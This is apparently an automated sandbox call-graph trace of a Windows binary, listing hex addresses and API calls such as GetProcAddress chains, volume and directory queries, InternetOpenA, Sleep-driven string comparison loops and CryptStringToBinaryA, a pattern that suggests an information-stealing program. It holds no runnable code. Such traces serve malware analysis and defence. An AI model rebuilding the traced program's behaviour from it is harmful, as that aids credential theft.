885b93 13466->13467 13468 88a820 2 API calls 13467->13468 13469 885ba0 13468->13469 13470 88a820 2 API calls 13469->13470 13471 885bad 13470->13471 13472 88a820 2 API calls 13471->13472 13473 885bf9 13472->13473 13703 8726a0 13473->13703 13481 885cc3 13482 886430 lstrcpy 13481->13482 13483 885cd5 13482->13483 13484 88a7a0 lstrcpy 13483->13484 13485 885cf2 13484->13485 13486 88a9b0 4 API calls 13485->13486 13487 885d0a 13486->13487 13488 88a8a0 lstrcpy 13487->13488 13489 885d16 13488->13489 13490 88a9b0 4 API calls 13489->13490 13491 885d3a 13490->13491 13492 88a8a0 lstrcpy 13491->13492 13493 885d46 13492->13493 13494 88a9b0 4 API calls 13493->13494 13495 885d6a 13494->13495 13496 88a8a0 lstrcpy 13495->13496 13497 885d76 13496->13497 13498 88a740 lstrcpy 13497->13498 13499 885d9e 13498->13499 14429 887500 GetWindowsDirectoryA 13499->14429 13502 88a7a0 lstrcpy 13503 885db8 13502->13503 14439 874880 13503->14439 13505 885dbe 14584 8817a0 13505->14584 13507 885dc6 13508 88a740 lstrcpy 13507->13508 13509 885de9 13508->13509 13510 871590 lstrcpy 13509->13510 13511 885dfd 13510->13511 14600 875960 13511->14600 13513 885e03 14744 881050 13513->14744 13515 885e0e 13516 88a740 lstrcpy 13515->13516 13517 885e32 13516->13517 13518 871590 lstrcpy 13517->13518 13519 885e46 13518->13519 13520 875960 34 API calls 13519->13520 13521 885e4c 13520->13521 14748 880d90 13521->14748 13523 885e57 13524 88a740 lstrcpy 13523->13524 13525 885e79 13524->13525 13526 871590 lstrcpy 13525->13526 13527 885e8d 13526->13527 13528 875960 34 API calls 13527->13528 13529 885e93 13528->13529 14755 880f40 13529->14755 13531 885e9e 13532 871590 lstrcpy 13531->13532 13533 885eb5 13532->13533 14760 881a10 13533->14760 13535 885eba 13536 88a740 lstrcpy 13535->13536 13537 885ed6 13536->13537 15104 874fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13537->15104 13539 885edb 13540 871590 lstrcpy 13539->13540 13541 885f5b 13540->13541 15111 880740 13541->15111 13543 885f60 13544 88a740 lstrcpy 13543->13544 13545 885f86 13544->13545 13546 871590 lstrcpy 13545->13546 13547 885f9a 13546->13547 13548 875960 34 API calls 13547->13548 13549 885fa0 13548->13549 13643 8745d1 RtlAllocateHeap 13642->13643 13646 874621 VirtualProtect 13643->13646 13646->13291 13647->13378 13649 8710c2 ctype 13648->13649 13650 8710fd 13649->13650 13651 8710e2 VirtualFree 13649->13651 13650->13408 13651->13650 13653 871233 GlobalMemoryStatusEx 13652->13653 13653->13411 13654->13435 13656 88a7c2 13655->13656 13657 88a7ec 13656->13657 13658 88a7da lstrcpy 13656->13658 13657->13440 13658->13657 13660 88a740 lstrcpy 13659->13660 13661 886833 13660->13661 13662 88a9b0 4 API calls 13661->13662 13663 886845 13662->13663 13664 88a8a0 lstrcpy 13663->13664 13665 88684e 13664->13665 13666 88a9b0 4 API calls 13665->13666 13667 886867 13666->13667 13668 88a8a0 lstrcpy 13667->13668 13669 886870 13668->13669 13670 88a9b0 4 API calls 13669->13670 13671 88688a 13670->13671 13672 88a8a0 lstrcpy 13671->13672 13673 886893 13672->13673 13674 88a9b0 4 API calls 13673->13674 13675 8868ac 13674->13675 13676 88a8a0 lstrcpy 13675->13676 13677 8868b5 13676->13677 13678 88a9b0 4 API calls 13677->13678 13679 8868cf 13678->13679 13680 88a8a0 lstrcpy 13679->13680 13681 8868d8 13680->13681 13682 88a9b0 4 API calls 13681->13682 13683 8868f3 13682->13683 13684 88a8a0 lstrcpy 13683->13684 13685 8868fc 13684->13685 13686 88a7a0 lstrcpy 13685->13686 13687 886910 13686->13687 13687->13447 13689 88a812 13688->13689 13689->13450 13691 88a83f 13690->13691 13692 885b54 13691->13692 13693 88a87b lstrcpy 13691->13693 13692->13460 13693->13692 13695 88a8a0 lstrcpy 13694->13695 13696 886443 13695->13696 13697 88a8a0 lstrcpy 13696->13697 13698 886455 13697->13698 13699 88a8a0 lstrcpy 13698->13699 13700 886467 13699->13700 13701 88a8a0 lstrcpy 13700->13701 13702 885b86 13701->13702 13702->13466 13704 8745c0 2 API calls 13703->13704 13705 8726b4 13704->13705 13706 8745c0 2 API calls 13705->13706 13707 8726d7 13706->13707 13708 8745c0 2 API calls 13707->13708 13709 8726f0 13708->13709 13710 8745c0 2 API calls 13709->13710 13711 872709 13710->13711 13712 8745c0 2 API calls 13711->13712 13713 872736 13712->13713 13714 8745c0 2 API calls 13713->13714 13715 87274f 13714->13715 13716 8745c0 2 API calls 13715->13716 13717 872768 13716->13717 13718 8745c0 2 API calls 13717->13718 13719 872795 13718->13719 13720 8745c0 2 API calls 13719->13720 13721 8727ae 13720->13721 13722 8745c0 2 API calls 13721->13722 13723 8727c7 13722->13723 13724 8745c0 2 API calls 13723->13724 13725 8727e0 13724->13725 13726 8745c0 2 API calls 13725->13726 13727 8727f9 13726->13727 13728 8745c0 2 API calls 13727->13728 13729 872812 13728->13729 13730 8745c0 2 API calls 13729->13730 13731 87282b 13730->13731 13732 8745c0 2 API calls 13731->13732 13733 872844 13732->13733 13734 8745c0 2 API calls 13733->13734 13735 87285d 13734->13735 13736 8745c0 2 API calls 13735->13736 13737 872876 13736->13737 13738 8745c0 2 API calls 13737->13738 13739 87288f 13738->13739 13740 8745c0 2 API calls 13739->13740 13741 8728a8 13740->13741 13742 8745c0 2 API calls 13741->13742 13743 8728c1 13742->13743 13744 8745c0 2 API calls 13743->13744 13745 8728da 13744->13745 13746 8745c0 2 API calls 13745->13746 13747 8728f3 13746->13747 13748 8745c0 2 API calls 13747->13748 13749 87290c 13748->13749 13750 8745c0 2 API calls 13749->13750 13751 872925 13750->13751 13752 8745c0 2 API calls 13751->13752 13753 87293e 13752->13753 13754 8745c0 2 API calls 13753->13754 13755 872957 13754->13755 13756 8745c0 2 API calls 13755->13756 13757 872970 13756->13757 13758 8745c0 2 API calls 13757->13758 13759 872989 13758->13759 13760 8745c0 2 API calls 13759->13760 13761 8729a2 13760->13761 13762 8745c0 2 API calls 13761->13762 13763 8729bb 13762->13763 13764 8745c0 2 API calls 13763->13764 13765 8729d4 13764->13765 13766 8745c0 2 API calls 13765->13766 13767 8729ed 13766->13767 13768 8745c0 2 API calls 13767->13768 13769 872a06 13768->13769 13770 8745c0 2 API calls 13769->13770 13771 872a1f 13770->13771 13772 8745c0 2 API calls 13771->13772 13773 872a38 13772->13773 13774 8745c0 2 API calls 13773->13774 13775 872a51 13774->13775 13776 8745c0 2 API calls 13775->13776 13777 872a6a 13776->13777 13778 8745c0 2 API calls 13777->13778 13779 872a83 13778->13779 13780 8745c0 2 API calls 13779->13780 13781 872a9c 13780->13781 13782 8745c0 2 API calls 13781->13782 13783 872ab5 13782->13783 13784 8745c0 2 API calls 13783->13784 13785 872ace 13784->13785 13786 8745c0 2 API calls 13785->13786 13787 872ae7 13786->13787 13788 8745c0 2 API calls 13787->13788 13789 872b00 13788->13789 13790 8745c0 2 API calls 13789->13790 13791 872b19 13790->13791 13792 8745c0 2 API calls 13791->13792 13793 872b32 13792->13793 13794 8745c0 2 API calls 13793->13794 13795 872b4b 13794->13795 13796 8745c0 2 API calls 13795->13796 13797 872b64 13796->13797 13798 8745c0 2 API calls 13797->13798 13799 872b7d 13798->13799 13800 8745c0 2 API calls 13799->13800 13801 872b96 13800->13801 13802 8745c0 2 API calls 13801->13802 13803 872baf 13802->13803 13804 8745c0 2 API calls 13803->13804 13805 872bc8 13804->13805 13806 8745c0 2 API calls 13805->13806 13807 872be1 13806->13807 13808 8745c0 2 API calls 13807->13808 13809 872bfa 13808->13809 13810 8745c0 2 API calls 13809->13810 13811 872c13 13810->13811 13812 8745c0 2 API calls 13811->13812 13813 872c2c 13812->13813 13814 8745c0 2 API calls 13813->13814 13815 872c45 13814->13815 13816 8745c0 2 API calls 13815->13816 13817 872c5e 13816->13817 13818 8745c0 2 API calls 13817->13818 13819 872c77 13818->13819 13820 8745c0 2 API calls 13819->13820 13821 872c90 13820->13821 13822 8745c0 2 API calls 13821->13822 13823 872ca9 13822->13823 13824 8745c0 2 API calls 13823->13824 13825 872cc2 13824->13825 13826 8745c0 2 API calls 13825->13826 13827 872cdb 13826->13827 13828 8745c0 2 API calls 13827->13828 13829 872cf4 13828->13829 13830 8745c0 2 API calls 13829->13830 13831 872d0d 13830->13831 13832 8745c0 2 API calls 13831->13832 13833 872d26 13832->13833 13834 8745c0 2 API calls 13833->13834 13835 872d3f 13834->13835 13836 8745c0 2 API calls 13835->13836 13837 872d58 13836->13837 13838 8745c0 2 API calls 13837->13838 13839 872d71 13838->13839 13840 8745c0 2 API calls 13839->13840 13841 872d8a 13840->13841 13842 8745c0 2 API calls 13841->13842 13843 872da3 13842->13843 13844 8745c0 2 API calls 13843->13844 13845 872dbc 13844->13845 13846 8745c0 2 API calls 13845->13846 13847 872dd5 13846->13847 13848 8745c0 2 API calls 13847->13848 13849 872dee 13848->13849 13850 8745c0 2 API calls 13849->13850 13851 872e07 13850->13851 13852 8745c0 2 API calls 13851->13852 13853 872e20 13852->13853 13854 8745c0 2 API calls 13853->13854 13855 872e39 13854->13855 13856 8745c0 2 API calls 13855->13856 13857 872e52 13856->13857 13858 8745c0 2 API calls 13857->13858 13859 872e6b 13858->13859 13860 8745c0 2 API calls 13859->13860 13861 872e84 13860->13861 13862 8745c0 2 API calls 13861->13862 13863 872e9d 13862->13863 13864 8745c0 2 API calls 13863->13864 13865 872eb6 13864->13865 13866 8745c0 2 API calls 13865->13866 13867 872ecf 13866->13867 13868 8745c0 2 API calls 13867->13868 13869 872ee8 13868->13869 13870 8745c0 2 API calls 13869->13870 13871 872f01 13870->13871 13872 8745c0 2 API calls 13871->13872 13873 872f1a 13872->13873 13874 8745c0 2 API calls 13873->13874 13875 872f33 13874->13875 13876 8745c0 2 API calls 13875->13876 13877 872f4c 13876->13877 13878 8745c0 2 API calls 13877->13878 13879 872f65 13878->13879 13880 8745c0 2 API calls 13879->13880 13881 872f7e 13880->13881 13882 8745c0 2 API calls 13881->13882 13883 872f97 13882->13883 13884 8745c0 2 API calls 13883->13884 13885 872fb0 13884->13885 13886 8745c0 2 API calls 13885->13886 13887 872fc9 13886->13887 13888 8745c0 2 API calls 13887->13888 13889 872fe2 13888->13889 13890 8745c0 2 API calls 13889->13890 13891 872ffb 13890->13891 13892 8745c0 2 API calls 13891->13892 13893 873014 13892->13893 13894 8745c0 2 API calls 13893->13894 13895 87302d 13894->13895 13896 8745c0 2 API calls 13895->13896 13897 873046 13896->13897 13898 8745c0 2 API calls 13897->13898 13899 87305f 13898->13899 13900 8745c0 2 API calls 13899->13900 13901 873078 13900->13901 13902 8745c0 2 API calls 13901->13902 13903 873091 13902->13903 13904 8745c0 2 API calls 13903->13904 13905 8730aa 13904->13905 13906 8745c0 2 API calls 13905->13906 13907 8730c3 13906->13907 13908 8745c0 2 API calls 13907->13908 13909 8730dc 13908->13909 13910 8745c0 2 API calls 13909->13910 13911 8730f5 13910->13911 13912 8745c0 2 API calls 13911->13912 13913 87310e 13912->13913 13914 8745c0 2 API calls 13913->13914 13915 873127 13914->13915 13916 8745c0 2 API calls 13915->13916 13917 873140 13916->13917 13918 8745c0 2 API calls 13917->13918 13919 873159 13918->13919 13920 8745c0 2 API calls 13919->13920 13921 873172 13920->13921 13922 8745c0 2 API calls 13921->13922 13923 87318b 13922->13923 13924 8745c0 2 API calls 13923->13924 13925 8731a4 13924->13925 13926 8745c0 2 API calls 13925->13926 13927 8731bd 13926->13927 13928 8745c0 2 API calls 13927->13928 13929 8731d6 13928->13929 13930 8745c0 2 API calls 13929->13930 13931 8731ef 13930->13931 13932 8745c0 2 API calls 13931->13932 13933 873208 13932->13933 13934 8745c0 2 API calls 13933->13934 13935 873221 13934->13935 13936 8745c0 2 API calls 13935->13936 13937 87323a 13936->13937 13938 8745c0 2 API calls 13937->13938 13939 873253 13938->13939 13940 8745c0 2 API calls 13939->13940 13941 87326c 13940->13941 13942 8745c0 2 API calls 13941->13942 13943 873285 13942->13943 13944 8745c0 2 API calls 13943->13944 13945 87329e 13944->13945 13946 8745c0 2 API calls 13945->13946 13947 8732b7 13946->13947 13948 8745c0 2 API calls 13947->13948 13949 8732d0 13948->13949 13950 8745c0 2 API calls 13949->13950 13951 8732e9 13950->13951 13952 8745c0 2 API calls 13951->13952 13953 873302 13952->13953 13954 8745c0 2 API calls 13953->13954 13955 87331b 13954->13955 13956 8745c0 2 API calls 13955->13956 13957 873334 13956->13957 13958 8745c0 2 API calls 13957->13958 13959 87334d 13958->13959 13960 8745c0 2 API calls 13959->13960 13961 873366 13960->13961 13962 8745c0 2 API calls 13961->13962 13963 87337f 13962->13963 13964 8745c0 2 API calls 13963->13964 13965 873398 13964->13965 13966 8745c0 2 API calls 13965->13966 13967 8733b1 13966->13967 13968 8745c0 2 API calls 13967->13968 13969 8733ca 13968->13969 13970 8745c0 2 API calls 13969->13970 13971 8733e3 13970->13971 13972 8745c0 2 API calls 13971->13972 13973 8733fc 13972->13973 13974 8745c0 2 API calls 13973->13974 13975 873415 13974->13975 13976 8745c0 2 API calls 13975->13976 13977 87342e 13976->13977 13978 8745c0 2 API calls 13977->13978 13979 873447 13978->13979 13980 8745c0 2 API calls 13979->13980 13981 873460 13980->13981 13982 8745c0 2 API calls 13981->13982 13983 873479 13982->13983 13984 8745c0 2 API calls 13983->13984 13985 873492 13984->13985 13986 8745c0 2 API calls 13985->13986 13987 8734ab 13986->13987 13988 8745c0 2 API calls 13987->13988 13989 8734c4 13988->13989 13990 8745c0 2 API calls 13989->13990 13991 8734dd 13990->13991 13992 8745c0 2 API calls 13991->13992 13993 8734f6 13992->13993 13994 8745c0 2 API calls 13993->13994 13995 87350f 13994->13995 13996 8745c0 2 API calls 13995->13996 13997 873528 13996->13997 13998 8745c0 2 API calls 13997->13998 13999 873541 13998->13999 14000 8745c0 2 API calls 13999->14000 14001 87355a 14000->14001 14002 8745c0 2 API calls 14001->14002 14003 873573 14002->14003 14004 8745c0 2 API calls 14003->14004 14005 87358c 14004->14005 14006 8745c0 2 API calls 14005->14006 14007 8735a5 14006->14007 14008 8745c0 2 API calls 14007->14008 14009 8735be 14008->14009 14010 8745c0 2 API calls 14009->14010 14011 8735d7 14010->14011 14012 8745c0 2 API calls 14011->14012 14013 8735f0 14012->14013 14014 8745c0 2 API calls 14013->14014 14015 873609 14014->14015 14016 8745c0 2 API calls 14015->14016 14017 873622 14016->14017 14018 8745c0 2 API calls 14017->14018 14019 87363b 14018->14019 14020 8745c0 2 API calls 14019->14020 14021 873654 14020->14021 14022 8745c0 2 API calls 14021->14022 14023 87366d 14022->14023 14024 8745c0 2 API calls 14023->14024 14025 873686 14024->14025 14026 8745c0 2 API calls 14025->14026 14027 87369f 14026->14027 14028 8745c0 2 API calls 14027->14028 14029 8736b8 14028->14029 14030 8745c0 2 API calls 14029->14030 14031 8736d1 14030->14031 14032 8745c0 2 API calls 14031->14032 14033 8736ea 14032->14033 14034 8745c0 2 API calls 14033->14034 14035 873703 14034->14035 14036 8745c0 2 API calls 14035->14036 14037 87371c 14036->14037 14038 8745c0 2 API calls 14037->14038 14039 873735 14038->14039 14040 8745c0 2 API calls 14039->14040 14041 87374e 14040->14041 14042 8745c0 2 API calls 14041->14042 14043 873767 14042->14043 14044 8745c0 2 API calls 14043->14044 14045 873780 14044->14045 14046 8745c0 2 API calls 14045->14046 14047 873799 14046->14047 14048 8745c0 2 API calls 14047->14048 14049 8737b2 14048->14049 14050 8745c0 2 API calls 14049->14050 14051 8737cb 14050->14051 14052 8745c0 2 API calls 14051->14052 14053 8737e4 14052->14053 14054 8745c0 2 API calls 14053->14054 14055 8737fd 14054->14055 14056 8745c0 2 API calls 14055->14056 14057 873816 14056->14057 14058 8745c0 2 API calls 14057->14058 14059 87382f 14058->14059 14060 8745c0 2 API calls 14059->14060 14061 873848 14060->14061 14062 8745c0 2 API calls 14061->14062 14063 873861 14062->14063 14064 8745c0 2 API calls 14063->14064 14065 87387a 14064->14065 14066 8745c0 2 API calls 14065->14066 14067 873893 14066->14067 14068 8745c0 2 API calls 14067->14068 14069 8738ac 14068->14069 14070 8745c0 2 API calls 14069->14070 14071 8738c5 14070->14071 14072 8745c0 2 API calls 14071->14072 14073 8738de 14072->14073 14074 8745c0 2 API calls 14073->14074 14075 8738f7 14074->14075 14076 8745c0 2 API calls 14075->14076 14077 873910 14076->14077 14078 8745c0 2 API calls 14077->14078 14079 873929 14078->14079 14080 8745c0 2 API calls 14079->14080 14081 873942 14080->14081 14082 8745c0 2 API calls 14081->14082 14083 87395b 14082->14083 14084 8745c0 2 API calls 14083->14084 14085 873974 14084->14085 14086 8745c0 2 API calls 14085->14086 14087 87398d 14086->14087 14088 8745c0 2 API calls 14087->14088 14089 8739a6 14088->14089 14090 8745c0 2 API calls 14089->14090 14091 8739bf 14090->14091 14092 8745c0 2 API calls 14091->14092 14093 8739d8 14092->14093 14094 8745c0 2 API calls 14093->14094 14095 8739f1 14094->14095 14096 8745c0 2 API calls 14095->14096 14097 873a0a 14096->14097 14098 8745c0 2 API calls 14097->14098 14099 873a23 14098->14099 14100 8745c0 2 API calls 14099->14100 14101 873a3c 14100->14101 14102 8745c0 2 API calls 14101->14102 14103 873a55 14102->14103 14104 8745c0 2 API calls 14103->14104 14105 873a6e 14104->14105 14106 8745c0 2 API calls 14105->14106 14107 873a87 14106->14107 14108 8745c0 2 API calls 14107->14108 14109 873aa0 14108->14109 14110 8745c0 2 API calls 14109->14110 14111 873ab9 14110->14111 14112 8745c0 2 API calls 14111->14112 14113 873ad2 14112->14113 14114 8745c0 2 API calls 14113->14114 14115 873aeb 14114->14115 14116 8745c0 2 API calls 14115->14116 14117 873b04 14116->14117 14118 8745c0 2 API calls 14117->14118 14119 873b1d 14118->14119 14120 8745c0 2 API calls 14119->14120 14121 873b36 14120->14121 14122 8745c0 2 API calls 14121->14122 14123 873b4f 14122->14123 14124 8745c0 2 API calls 14123->14124 14125 873b68 14124->14125 14126 8745c0 2 API calls 14125->14126 14127 873b81 14126->14127 14128 8745c0 2 API calls 14127->14128 14129 873b9a 14128->14129 14130 8745c0 2 API calls 14129->14130 14131 873bb3 14130->14131 14132 8745c0 2 API calls 14131->14132 14133 873bcc 14132->14133 14134 8745c0 2 API calls 14133->14134 14135 873be5 14134->14135 14136 8745c0 2 API calls 14135->14136 14137 873bfe 14136->14137 14138 8745c0 2 API calls 14137->14138 14139 873c17 14138->14139 14140 8745c0 2 API calls 14139->14140 14141 873c30 14140->14141 14142 8745c0 2 API calls 14141->14142 14143 873c49 14142->14143 14144 8745c0 2 API calls 14143->14144 14145 873c62 14144->14145 14146 8745c0 2 API calls 14145->14146 14147 873c7b 14146->14147 14148 8745c0 2 API calls 14147->14148 14149 873c94 14148->14149 14150 8745c0 2 API calls 14149->14150 14151 873cad 14150->14151 14152 8745c0 2 API calls 14151->14152 14153 873cc6 14152->14153 14154 8745c0 2 API calls 14153->14154 14155 873cdf 14154->14155 14156 8745c0 2 API calls 14155->14156 14157 873cf8 14156->14157 14158 8745c0 2 API calls 14157->14158 14159 873d11 14158->14159 14160 8745c0 2 API calls 14159->14160 14161 873d2a 14160->14161 14162 8745c0 2 API calls 14161->14162 14163 873d43 14162->14163 14164 8745c0 2 API calls 14163->14164 14165 873d5c 14164->14165 14166 8745c0 2 API calls 14165->14166 14167 873d75 14166->14167 14168 8745c0 2 API calls 14167->14168 14169 873d8e 14168->14169 14170 8745c0 2 API calls 14169->14170 14171 873da7 14170->14171 14172 8745c0 2 API calls 14171->14172 14173 873dc0 14172->14173 14174 8745c0 2 API calls 14173->14174 14175 873dd9 14174->14175 14176 8745c0 2 API calls 14175->14176 14177 873df2 14176->14177 14178 8745c0 2 API calls 14177->14178 14179 873e0b 14178->14179 14180 8745c0 2 API calls 14179->14180 14181 873e24 14180->14181 14182 8745c0 2 API calls 14181->14182 14183 873e3d 14182->14183 14184 8745c0 2 API calls 14183->14184 14185 873e56 14184->14185 14186 8745c0 2 API calls 14185->14186 14187 873e6f 14186->14187 14188 8745c0 2 API calls 14187->14188 14189 873e88 14188->14189 14190 8745c0 2 API calls 14189->14190 14191 873ea1 14190->14191 14192 8745c0 2 API calls 14191->14192 14193 873eba 14192->14193 14194 8745c0 2 API calls 14193->14194 14195 873ed3 14194->14195 14196 8745c0 2 API calls 14195->14196 14197 873eec 14196->14197 14198 8745c0 2 API calls 14197->14198 14199 873f05 14198->14199 14200 8745c0 2 API calls 14199->14200 14201 873f1e 14200->14201 14202 8745c0 2 API calls 14201->14202 14203 873f37 14202->14203 14204 8745c0 2 API calls 14203->14204 14205 873f50 14204->14205 14206 8745c0 2 API calls 14205->14206 14207 873f69 14206->14207 14208 8745c0 2 API calls 14207->14208 14209 873f82 14208->14209 14210 8745c0 2 API calls 14209->14210 14211 873f9b 14210->14211 14212 8745c0 2 API calls 14211->14212 14213 873fb4 14212->14213 14214 8745c0 2 API calls 14213->14214 14215 873fcd 14214->14215 14216 8745c0 2 API calls 14215->14216 14217 873fe6 14216->14217 14218 8745c0 2 API calls 14217->14218 14219 873fff 14218->14219 14220 8745c0 2 API calls 14219->14220 14221 874018 14220->14221 14222 8745c0 2 API calls 14221->14222 14223 874031 14222->14223 14224 8745c0 2 API calls 14223->14224 14225 87404a 14224->14225 14226 8745c0 2 API calls 14225->14226 14227 874063 14226->14227 14228 8745c0 2 API calls 14227->14228 14229 87407c 14228->14229 14230 8745c0 2 API calls 14229->14230 14231 874095 14230->14231 14232 8745c0 2 API calls 14231->14232 14233 8740ae 14232->14233 14234 8745c0 2 API calls 14233->14234 14235 8740c7 14234->14235 14236 8745c0 2 API calls 14235->14236 14237 8740e0 14236->14237 14238 8745c0 2 API calls 14237->14238 14239 8740f9 14238->14239 14240 8745c0 2 API calls 14239->14240 14241 874112 14240->14241 14242 8745c0 2 API calls 14241->14242 14243 87412b 14242->14243 14244 8745c0 2 API calls 14243->14244 14245 874144 14244->14245 14246 8745c0 2 API calls 14245->14246 14247 87415d 14246->14247 14248 8745c0 2 API calls 14247->14248 14249 874176 14248->14249 14250 8745c0 2 API calls 14249->14250 14251 87418f 14250->14251 14252 8745c0 2 API calls 14251->14252 14253 8741a8 14252->14253 14254 8745c0 2 API calls 14253->14254 14255 8741c1 14254->14255 14256 8745c0 2 API calls 14255->14256 14257 8741da 14256->14257 14258 8745c0 2 API calls 14257->14258 14259 8741f3 14258->14259 14260 8745c0 2 API calls 14259->14260 14261 87420c 14260->14261 14262 8745c0 2 API calls 14261->14262 14263 874225 14262->14263 14264 8745c0 2 API calls 14263->14264 14265 87423e 14264->14265 14266 8745c0 2 API calls 14265->14266 14267 874257 14266->14267 14268 8745c0 2 API calls 14267->14268 14269 874270 14268->14269 14270 8745c0 2 API calls 14269->14270 14271 874289 14270->14271 14272 8745c0 2 API calls 14271->14272 14273 8742a2 14272->14273 14274 8745c0 2 API calls 14273->14274 14275 8742bb 14274->14275 14276 8745c0 2 API calls 14275->14276 14277 8742d4 14276->14277 14278 8745c0 2 API calls 14277->14278 14279 8742ed 14278->14279 14280 8745c0 2 API calls 14279->14280 14281 874306 14280->14281 14282 8745c0 2 API calls 14281->14282 14283 87431f 14282->14283 14284 8745c0 2 API calls 14283->14284 14285 874338 14284->14285 14286 8745c0 2 API calls 14285->14286 14287 874351 14286->14287 14288 8745c0 2 API calls 14287->14288 14289 87436a 14288->14289 14290 8745c0 2 API calls 14289->14290 14291 874383 14290->14291 14292 8745c0 2 API calls 14291->14292 14293 87439c 14292->14293 14294 8745c0 2 API calls 14293->14294 14295 8743b5 14294->14295 14296 8745c0 2 API calls 14295->14296 14297 8743ce 14296->14297 14298 8745c0 2 API calls 14297->14298 14299 8743e7 14298->14299 14300 8745c0 2 API calls 14299->14300 14301 874400 14300->14301 14302 8745c0 2 API calls 14301->14302 14303 874419 14302->14303 14304 8745c0 2 API calls 14303->14304 14305 874432 14304->14305 14306 8745c0 2 API calls 14305->14306 14307 87444b 14306->14307 14308 8745c0 2 API calls 14307->14308 14309 874464 14308->14309 14310 8745c0 2 API calls 14309->14310 14311 87447d 14310->14311 14312 8745c0 2 API calls 14311->14312 14313 874496 14312->14313 14314 8745c0 2 API calls 14313->14314 14315 8744af 14314->14315 14316 8745c0 2 API calls 14315->14316 14317 8744c8 14316->14317 14318 8745c0 2 API calls 14317->14318 14319 8744e1 14318->14319 14320 8745c0 2 API calls 14319->14320 14321 8744fa 14320->14321 14322 8745c0 2 API calls 14321->14322 14323 874513 14322->14323 14324 8745c0 2 API calls 14323->14324 14325 87452c 14324->14325 14326 8745c0 2 API calls 14325->14326 14327 874545 14326->14327 14328 8745c0 2 API calls 14327->14328 14329 87455e 14328->14329 14330 8745c0 2 API calls 14329->14330 14331 874577 14330->14331 14332 8745c0 2 API calls 14331->14332 14333 874590 14332->14333 14334 8745c0 2 API calls 14333->14334 14335 8745a9 14334->14335 14336 889c10 14335->14336 14337 889c20 43 API calls 14336->14337 14338 88a036 8 API calls 14336->14338 14337->14338 14339 88a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14338->14339 14340 88a146 14338->14340 14339->14340 14341 88a153 8 API calls 14340->14341 14342 88a216 14340->14342 14341->14342 14343 88a298 14342->14343 14344 88a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14342->14344 14345 88a2a5 6 API calls 14343->14345 14346 88a337 14343->14346 14344->14343 14345->14346 14347 88a41f 14346->14347 14348 88a344 9 API calls 14346->14348 14349 88a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14347->14349 14350 88a4a2 14347->14350 14348->14347 14349->14350 14351 88a4ab GetProcAddress GetProcAddress 14350->14351 14352 88a4dc 14350->14352 14351->14352 14353 88a515 14352->14353 14354 88a4e5 GetProcAddress GetProcAddress 14352->14354 14355 88a612 14353->14355 14356 88a522 10 API calls 14353->14356 14354->14353 14357 88a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14355->14357 14358 88a67d 14355->14358 14356->14355 14357->14358 14359 88a69e 14358->14359 14360 88a686 GetProcAddress 14358->14360 14361 885ca3 14359->14361 14362 88a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14359->14362 14360->14359 14363 871590 14361->14363 14362->14361 15482 871670 14363->15482 14366 88a7a0 lstrcpy 14367 8715b5 14366->14367 14368 88a7a0 lstrcpy 14367->14368 14369 8715c7 14368->14369 14370 88a7a0 lstrcpy 14369->14370 14371 8715d9 14370->14371 14372 88a7a0 lstrcpy 14371->14372 14373 871663 14372->14373 14374 885510 14373->14374 14375 885521 14374->14375 14376 88a820 2 API calls 14375->14376 14377 88552e 14376->14377 14378 88a820 2 API calls 14377->14378 14379 88553b 14378->14379 14380 88a820 2 API calls 14379->14380 14381 885548 14380->14381 14382 88a740 lstrcpy 14381->14382 14383 885555 14382->14383 14384 88a740 lstrcpy 14383->14384 14385 885562 14384->14385 14386 88a740 lstrcpy 14385->14386 14387 88556f 14386->14387 14388 88a740 lstrcpy 14387->14388 14428 88557c 14388->14428 14389 88a740 lstrcpy 14389->14428 14390 8852c0 25 API calls 14390->14428 14391 885643 StrCmpCA 14391->14428 14392 8856a0 StrCmpCA 14393 8857dc 14392->14393 14392->14428 14394 88a8a0 lstrcpy 14393->14394 14395 8857e8 14394->14395 14396 88a820 2 API calls 14395->14396 14397 8857f6 14396->14397 14400 88a820 2 API calls 14397->14400 14398 885856 StrCmpCA 14401 885991 14398->14401 14398->14428 14399 8851f0 20 API calls 14399->14428 14402 885805 14400->14402 14403 88a8a0 lstrcpy 14401->14403 14404 871670 lstrcpy 14402->14404 14405 88599d 14403->14405 14426 885811 14404->14426 14406 88a820 2 API calls 14405->14406 14408 8859ab 14406->14408 14407 88a820 lstrlen lstrcpy 14407->14428 14410 88a820 2 API calls 14408->14410 14409 885a0b StrCmpCA 14411 885a28 14409->14411 14412 885a16 Sleep 14409->14412 14414 8859ba 14410->14414 14415 88a8a0 lstrcpy 14411->14415 14412->14428 14413 88a7a0 lstrcpy 14413->14428 14416 871670 lstrcpy 14414->14416 14417 885a34 14415->14417 14416->14426 14418 88a820 2 API calls 14417->14418 14419 885a43 14418->14419 14420 88a820 2 API calls 14419->14420 14422 885a52 14420->14422 14421 88578a StrCmpCA 14421->14428 14423 871670 lstrcpy 14422->14423 14423->14426 14424 871590 lstrcpy 14424->14428 14425 88593f StrCmpCA 14425->14428 14426->13481 14427 88a8a0 lstrcpy 14427->14428 14428->14389 14428->14390 14428->14391 14428->14392 14428->14398 14428->14399 14428->14407 14428->14409 14428->14413 14428->14421 14428->14424 14428->14425 14428->14427 14430 88754c 14429->14430 14431 887553 GetVolumeInformationA 14429->14431 14430->14431 14435 887591 14431->14435 14432 8875fc GetProcessHeap RtlAllocateHeap 14433 887628 wsprintfA 14432->14433 14434 887619 14432->14434 14437 88a740 lstrcpy 14433->14437 14436 88a740 lstrcpy 14434->14436 14435->14432 14438 885da7 14436->14438 14437->14438 14438->13502 14440 88a7a0 lstrcpy 14439->14440 14441 874899 14440->14441 15491 8747b0 14441->15491 14443 8748a5 14444 88a740 lstrcpy 14443->14444 14445 8748d7 14444->14445 14446 88a740 lstrcpy 14445->14446 14447 8748e4 14446->14447 14448 88a740 lstrcpy 14447->14448 14449 8748f1 14448->14449 14450 88a740 lstrcpy 14449->14450 14451 8748fe 14450->14451 14452 88a740 lstrcpy 14451->14452 14453 87490b InternetOpenA StrCmpCA 14452->14453 14454 874944 14453->14454 14455 874ecb InternetCloseHandle 14454->14455 15497 888b60 14454->15497 14457 874ee8 14455->14457 15513 879ac0 CryptStringToBinaryA 14457->15513 14458 874963 15505 88a920 14458->15505 14461 874976 